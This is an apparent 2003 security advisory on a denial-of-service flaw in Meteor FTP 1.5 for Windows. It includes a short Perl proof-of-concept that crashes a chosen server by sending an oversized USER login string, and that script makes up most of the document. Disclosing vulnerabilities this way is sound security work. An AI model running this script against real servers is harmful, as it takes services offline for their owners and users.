Denial of Service in Meteor FTP Server for Windows

ReportedAugust 09, 2003, by Zee.

VERSIONSAFFECTED

Meteor FTP 1.5 forWindows

DESCRIPTION

ADenial of Service (DoS) condition exists in Meteor FTP 1.5 forWindows. By connecting to the Meteor FTP server and issuing the USERcommand followed by large amounts of data, the FTP server will stopresponding.

DEMONSTRATION

Thediscoverer posted the following code as proof of concept:

#!/usr/bin/perl

#

#meteordos.pl - Remote DoS against Meteor FTP Version 1.5

#

#A vulnerability in Meteor FTP 1.5 allows malicious users

#to remotely crash the ftpd. By connecting to the ftpd and

#issuing USER, followed by large amounts of data, the server

#crashes. For more information, go to :

#http://www.evicted.org/projects/writings/mftpadvisory.txt

#

#Usage : ./meteordos.pl

#

#Vulnerability & code by zerash

#Contact : [email protected]

useNet::FTP;

$host= $ARGV[0];

if("$ARGV[0]"eq "") {

print("DoSagainst Meteor FTP Version 1.5 by [email protected]");

die("Usage: ./meteorftpdos ");

}else {

print("Connectingto $host...");

my$ftp = Net::FTP->new($host) or die "Couldn't connect to$host";

print("Connected!");

print("Attemptingto exploit the ftpd...");

$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');

$ftp->quit;

print("Success!");

}

VENDORRESPONSE

MeteorSofthas been notified.

CREDIT
Discoveredby Zee.